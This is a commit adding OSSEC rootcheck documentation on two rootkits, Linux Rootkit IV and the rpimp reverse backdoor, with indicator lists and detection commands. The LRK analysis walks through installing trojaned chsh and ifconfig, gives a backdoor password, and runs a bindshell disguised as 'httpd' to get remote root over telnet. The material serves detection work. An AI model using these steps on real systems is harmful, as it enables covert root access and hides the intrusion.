1. Jeremy Rossi
  2. ossec-rules

Commits

Jeremy Rossi  committed 3f49925 Merge
  • Participants
  • Parent commits d451a01, 04c2d65
  • Branches default

Comments (0)

Files changed (4)

File docs/rootcheck/analysis-lrk5.rst

View file
+
+.. _analysis-lrk:
+
+
+Analysis of a rootkit: Linux Rootkit
+====================================
+
+
+Linux Rootkit IV
+by Lord Somer
+
+Released November 26, 1998 
+
+Linux Rootkit IV is the newest version of a well-known trojan-package for Linux system. The 
+rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, 
+chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, 
+passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2 
+
+In this example I tested chsh, bindshell and ifconfig. 
+
+In the first example below, I compiled only chsh in /chsh-directory and used 'fix' to replace 
+the original with the trojan version. ::
+
+    [root@parittaja chsh]# ls -al
+    total 201
+    drwxr--r--   2 jj       jj           1024 Mar 18 02:10 .
+    drwxr-xr-x  19 jj       jj           1024 Mar 18 02:09 ..
+    -rw-------   1 jj       jj            109 Nov 24 06:27 Makefile
+    -rwxr-xr-x   1 root     dzeijay    185448 Mar 18 02:09 chsh
+    -rw-------   1 jj       jj           8786 Nov 24 06:27 chsh.c
+    -rw-------   1 jj       jj           5283 Nov 24 06:27 setpwnam.c
+    [root@parittaja chsh]# make
+    gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
+    -DVARPATH=\"\" chsh.c -o chsh.o
+    gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
+    -DVARPATH=\"\" setpwnam.c -o setpwnam.o
+    gcc -s -N  chsh.o setpwnam.o   -o chsh
+    [root@parittaja chsh]# ls -al
+    total 210
+    drwxr--r--   2 jj       jj           1024 Mar 18 02:10 .
+    drwxr-xr-x  19 jj       jj           1024 Mar 18 02:09 ..
+    -rw-------   1 jj       jj            109 Nov 24 06:27 Makefile
+    -rwxr-xr-x   1 root     dzeijay    185448 Mar 18 02:10 chsh
+    -rw-------   1 jj       jj           8786 Nov 24 06:27 chsh.c
+    -rw-r--r--   1 root     dzeijay      5544 Mar 18 02:10 chsh.o
+    -rw-------   1 jj       jj           5283 Nov 24 06:27 setpwnam.c
+    -rw-r--r--   1 root     dzeijay      2488 Mar 18 02:10 setpwnam.o
+    [root@parittaja chsh]# ../fix /usr/bin/chsh ./chsh ../backup/chsh
+    fix: Last 17 bytes not zero
+    fix: Can't fix checksum
+    fix: File /usr/bin/chsh fixed
+    [root@parittaja chsh]# ls -al /usr/bin/chsh
+    -rwsr-xr-x   1 root     root       185448 Mar 18 02:08 /usr/bin/chsh
+    [root@parittaja chsh]# ls -al ../backup/chsh
+    -rwsr-xr-x   1 root     dzeijay      9620 Mar 18 02:11 ../backup/chsh
+    [root@parittaja chsh]#
+
+As can be noticed, the fixing wasn't all that successful, and the trojaned program would easily 
+be caught because of it's huge size.  Later on, it is easy to get a root shell by typing the 
+specific password. ::
+
+    [jj@rikas jj]$ id
+    uid=511(jj) gid=530(jj) groups=530(jj)
+    [jj@rikas jj]$ chsh
+    Changing shell for jj.
+    New shell [/bin/tcsh]: satori
+    [root@rikas jj]# id
+    uid=0(root) gid=0(root) groups=530(jj)
+    [root@rikas jj]# exit
+    exit
+    [jj@rikas jj]$
+
+A problem with chsh (and chfn) is that the original system commands in the newer Linux systems 
+asks for the user password before asking for a new shell etc. The trojaned versions in these 
+rootkits won't do that and are therefore easily discovered. But, it wouldn't require very 
+much to implement that, or better even to trojan the newer versions of chsh and chfn. This 
+reminds of the system specific requirements of trojan programs. A trojan coder (and user 
+naturally!) must know how the original command works exactly, otherwise they are immediately 
+caught. This limit's the portability and distribution of existing trojans to those specific 
+systems (platforms, kernel versions, distrubution and program versions etc) they were made to. 
+The second example is more sophisticated rootkit/trojan "attack" and utilizes the "bindshell" 
+program that comes in Linux Rootkit IV. Bindshell "binds" itself to a specific port and remains 
+waiting for new connections. When a connection is established (from the same computer or 
+from somewhere else), you can type commands ending with a semicolon, and the bindshell 
+executes them in the system with root-priviledges (if binded as root). Very handy. 
+
+In the example below, bindshell is first compiled and right owners are set. Then I renamed 
+it to 'httpd' to make it harder to notice and finally put it running in the background. 
+It would be wise to pick a process-name that is widely used in the system and relatively 
+small (of course you could do the bindshell program exactly as big as some specific process) 
+to make it as transparent as possible. These run-time programs are harder to track in large 
+systems where there are lots of user processes running. ::
+
+    [root@parittaja lrk4]# make bindshell
+    gcc -O2 -fomit-frame-pointer -pipe -I/usr/include/bsd -include /usr/include/bsd/bsd.h
+    bindshell.c  -lbsd -o bindshell
+    [root@parittaja lrk4]# chown root.root bindshell
+    [root@parittaja lrk4]# mv bindshell httpd
+    [root@parittaja lrk4]# ls -al httpd
+    -rwxr-xr-x   1 root     root         5339 Mar 18 02:36 httpd
+    [root@parittaja lrk4]# httpd
+    [root@parittaja lrk4]# rm httpd
+    [root@parittaja lrk4]# ps aux | grep httpd
+    nobody    1378  0.0  1.6  1168   504  ?  S  Mar 14   0:00 httpd 
+    nobody    1379  0.0  1.4  1168   436  ?  S  Mar 14   0:00 httpd 
+    nobody    1380  0.0  1.3  1168   432  ?  S  Mar 14   0:00 httpd 
+    nobody    1381  0.0  1.3  1168   416  ?  S  Mar 14   0:00 httpd 
+    nobody    1382  0.0  1.3  1168   428  ?  S  Mar 14   0:00 httpd 
+    root       319  0.0  1.1  1168   356  ?  S  Jan  5   0:00 httpd 
+    root     18281  0.0  0.7   856   224  ?  S   02:33   0:00 httpd 
+    root     18518  0.0  1.1   968   340  p4 S   02:37   0:00 grep httpd 
+    [root@parittaja lrk4]# 
+
+Now when the process is running, I can contact the victim computer from any other computer 
+with telnet or likes and do what I wish with root-priviledges. Notice, that I don't even 
+need a user account on the target machine - there's no login! ::
+
+    [jj@rikas jj]$ telnet parittaja 31337
+    Trying 10.0.0.61...
+    Connected to parittaja.sec.
+    Escape character is '^]'.
+    ls -al /root/private.txt;
+    -rw-r--r--   1 root     root            0 Mar 18 02:30 /root/private.txt
+    : command not found
+    rm -f /root/private.txt;
+    : command not found
+    ls -al /root/private.txt;
+    ls: /root/private.txt: No such file or directory
+    : command not found
+    exit;
+    Connection closed by foreign host.
+    [jj@rikas jj]$ 
+
+As an example of those not-rootshell-giving-programs, let's take a look at 'ifconfig'. Ifconfig 
+is a general interface configuration tool for many purposes. You can set up your interface or 
+check it's current status. One classical feature of ifconfig is that it shows you if an 
+ethernet network card attached to the system is in so called 'promiscous mode'. That would 
+indicate, that somebody is sniffering the net-traffic flowing by the card. If the 
+sniffering is of malicious intension, it would be preferrable to do it in silence. 
+One solution is to trojan ifconfig. ::
+
+    [root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
+    lo        Link encap:Local Loopback  
+              inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
+              UP BROADCAST LOOPBACK RUNNING  MTU:3584  Metric:1
+              RX packets:38794 errors:0 dropped:0 overruns:0 frame:0
+              TX packets:38794 errors:0 dropped:0 overruns:0 carrier:0
+              collisions:0 
+
+    eth0      Link encap:Ethernet  HWaddr 00:10:5A:3B:3C:0E  
+              inet addr:10.0.0.81  Bcast:10.0.0.255  Mask:255.255.255.0
+              UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
+              RX packets:3464563 errors:0 dropped:0 overruns:0 frame:0
+              TX packets:260648 errors:0 dropped:0 overruns:0 carrier:12
+              collisions:3099 
+              Interrupt:10 Base address:0xb800 
+
+    [root@rikas net-tools-1.32-alpha]# 
+
+Ifconfig shows that the ethernet is running in promiscous mode. So let's replace it with a trojaned 
+version (compiled earlier, comes with Linux Rootkit IV). ::
+
+    [root@rikas net-tools-1.32-alpha]# ../fix /sbin/ifconfig ./ifconfig ../backup/ifconfig
+    fix: Last 17 bytes not zero
+    fix: Can't fix checksum
+    fix: File /sbin/ifconfig fixed
+    [root@rikas net-tools-1.32-alpha]# ls -al /sbin/ifconfig
+    -rwxr-xr-x   1 root     root        19840 maalis 17 23:33 /sbin/ifconfig
+    [root@rikas net-tools-1.32-alpha]# ls -al ../backup/ifconfig
+    -rwxr-xr-x   1 root     dzeijay     25596 maalis 18 03:19 ../backup/ifconfig
+    [root@rikas net-tools-1.32-alpha]#
+
+Now let's check again... ::
+
+    [root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
+    lo        Link encap:Local Loopback  
+              inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
+              UP BROADCAST LOOPBACK RUNNING  MTU:3584  Metric:1
+              RX packets:38795 errors:0 dropped:0 overruns:0
+              TX packets:38795 errors:0 dropped:0 overruns:0
+
+    eth0      Link encap:10Mbps Ethernet  HWaddr 00:10:5A:3B:3C:0E
+              inet addr:10.0.0.81  Bcast:10.0.0.255  Mask:255.255.255.0
+              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+              RX packets:3464854 errors:0 dropped:0 overruns:0
+              TX packets:260910 errors:0 dropped:0 overruns:0
+              Interrupt:10 Base address:0xb800 
+
+    [root@rikas net-tools-1.32-alpha]# 
+
+...and the 'PROMISC' is gone. 
+Linux Rootkit IV compiles fine on an old RedHat 4.2 (libc5), but requires modifications for newer systems. 
+
+Fear...your system may be trojaned... 
+

File docs/rootcheck/analysis-rpimp.rst

View file
+.. analysis-rpimp::
+
+
+Analysis of a rootkit: rpimp
+============================
+
+by: Daniel B. Cid 
+to: Open Source Security
+
+
+Rpimp is an interesting backdoor. Its allows the attacker to bypass the firewall protection, 
+using some permitted port.
+
+Defition by the author (of rpimp):
+
+    Reverse Pimpage was designed to allow you to access a box that is behind a
+    firewall from outside that firewall itself.  The way it accomplishes this is
+    by having the "client", the box behind the firewall, send in certain intervals
+    a SYN request to a certain port.  The reason it does it in intervals is so that
+    some routers dont freak out that they're getting a continous stream of SYN
+    requests, and for efficiency.  Once you get home for the day you simply run the
+    "server" on your home PC and when the time interval is up it will connect.
+    Once it's connected the "client" telnets to itself and routes data back and
+    forth between the two.  It's rather efficient and the security is there.
+
+
+Usage:
+------
+
+Usage::
+
+    root@rootkit:/test/exploits/rp# ./rpimp  --help
+    ./rpimp: invalid option -- -
+    Usage: ./rpimp [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
+                    [-g gateway] [-P protocol]
+                    [-E escapechar]
+
+
+Strings (interesting parts)::
+
+    /lib/ld-linux.so.2
+    libnsl.so.1
+    connect
+    bind
+    inet_addr
+    stdin
+    strstr
+    signal
+    read
+    listen
+    fork
+    getopt
+    memset
+    cfmakeraw
+    tcgetattr
+    gethostbyname
+    stderr
+    fwrite
+    exit
+    Connection established.
+    Escape character is '%c%c'
+    -g		optional gateway
+    -v		version option.
+    127.0.0.1
+    Exiting...
+    Client suggested, but host not given.
+    Successfully forked into pid %i
+    ERROR: unable to fork, continueing...
+    FATAL: Neither server or client defined, exiting.
+    Reverse Pimpage v2.1 by: Matt Miller (warped@hick.org)
+        Bug fixes and Term Emul. by Tommy (dantar@dantar.com)
+    Usage: %s [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
+            [-g gateway] [-P protocol]
+            [-E escapechar]
+    -s		Server option, -h not needed.
+    -c		Client option, host needed.
+    -t		timeout for client to reconnect.
+    -e		expect string to expect from gateway (will send remotehost)
+    -P		protocol to use, either telnet or none.
+    Unable to resolve %s
+    telnet
+    127.0.0.1
+
+
+Ways to detect
+--------------
+
+
+1- See with tcpdump if you have any program trying to connect to a remote
+machine on port 1040 (this port can change, but this one is the default).::
+
+    tcpdump -i eth0 tcp port 1040 
+
+    --
+    13:26:47.490302 192.168.1.107.32781 > 192.168.1.106.1040: S 3771526166:3771526166(0) win 5840 <mss 1460,sackOK,timestamp 647210 0,nop,wscale 0> (DF)
+    13:26:47.491062 192.168.1.106.1040 > 192.168.1.107.32781: R 0:0(0) ack 3771526167 win 0 (DF)
+
+
+2- Verify if you have any program rpimp running.::
+
+    ps -aux | grep rpimp
+
+    root      2493  0.0  0.1  1420  308 tty1     S    13:25   0:00 ./rpimp -c -h 192168.1.106
+
+
+3- Using lsof, look for some entries similar to that one::
+
+    rpimp     2493 root  mem    REG        3,3  672140    194066 /lib/ld-2.3.1.so
+    rpimp     2493 root  mem    REG        3,3   87653    194048 /lib/libnsl-2.3.1.so
+    rpimp     2493 root  mem    REG        3,3 1435624    194045 /lib/libc-2.3.1.so
+    rpimp     2493 root    0u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    1u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    2u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    3u  sock        0,0             14410 can't identify protocol
+    rpimp     2493 root    4u  sock        0,0             14604 can't identify protocol
+    rpimp     2493 root    5u  sock        0,0             14610 can't identify protocol
+    rpimp     2493 root    6u  sock        0,0             14611 can't identify protocol
+
+    rpimp     2493 root    3u  sock        0,0             14410 can't identify protocol
+
+

File docs/rootcheck/rootcheck-irk.rst

View file
+
+Information about the LRK rootkit 
+===================================
+
+Information about LRK (Linux Rootkits) 
+
+More Information
+----------------
+
+The LRK is a very famous rootkit used to infect Linux systems. It have a lot of 
+versions (3,4,5) and has been in the wild since 1997 (if i am not wrong). The 
+main purpose of this rootkit is to infect some binaries of the system to hide 
+the "cracker" presence.  More info about the LRK can be found in this link: 
+:ref:`analysis-lrk5`
+
+The README file from lrk4 can be found here
+The README file from lrk5 can be found here
+
+Downloads: 
+lrk4.src c2f886c7af1e6318f79460ff0ffe4f5e 
+lrk5.src e18b708650f7dc4cca447df33d09740f 
+
+Files to search
+---------------
+
+- ``/dev/ida/.inet``
+- ``*bindshell``
+
+Ports used by LRK: 
+
+- ``37337``
+
+Binaries to search: 
+
+- ``bindshell``
+- ``chfn``
+- ``chsh``
+- ``crontab``
+- ``du``
+- ``find``
+- ``fix``
+- ``ifconfig``
+- ``inetd``
+- ``killall``
+- ``linsniffer``
+- ``login``
+- ``ls``
+- ``netstat``
+- ``passwd``
+- ``pidof``
+- ``ps``
+- ``rshd``
+- ``sniffchk``
+- ``syslogd``
+- ``tcpd``
+- ``top``
+- ``wted``
+- ``z2``
+
+
+.. note::
+    
+    All files with an "*" need to be search in all system
+
+If you have any more Information about this rootkits sent to rootkits at ossec.net 
+

File docs/rootcheck/rootcheck-rpimp.rst

View file
+
+Information about the RPimp Rootkit 
+======================================
+
+
+More Information
+----------------
+
+Reverse Pimpage was designed to allow you to access a box that is behind a 
+firewall from outside that firewall itself. The way it accomplishes this is
+by having the "client", the box behind the firewall, send in certain 
+intervals a SYN request to a certain port. The reason it does it in 
+intervals is so that some routers dont freak out that they're getting 
+a continous stream of SYN requests, and for efficiency. Once you get 
+home for the day you simply run the "server" on your home PC and when 
+the time interval is up it will connect. 
+Once it's connected the "client" telnets to itself and routes data back and
+forth between the two. It's rather efficient and the security is there.
+
+A rpimp`s analyse, done by Daniel Cid (me), can be found in the link:
+:ref:`analysis-rpimp`
+
+Download: rpv21.tar.gz bc494b0a8cd6928710f1a50462b1d5b4 
+
+Files
+-----
+
+-- ``*rpimp``
+
+.. note::
+
+    All files with an "*" need to be search in all system
+
+If you have any more Information about this rootkits sent to rootkits at ossec.net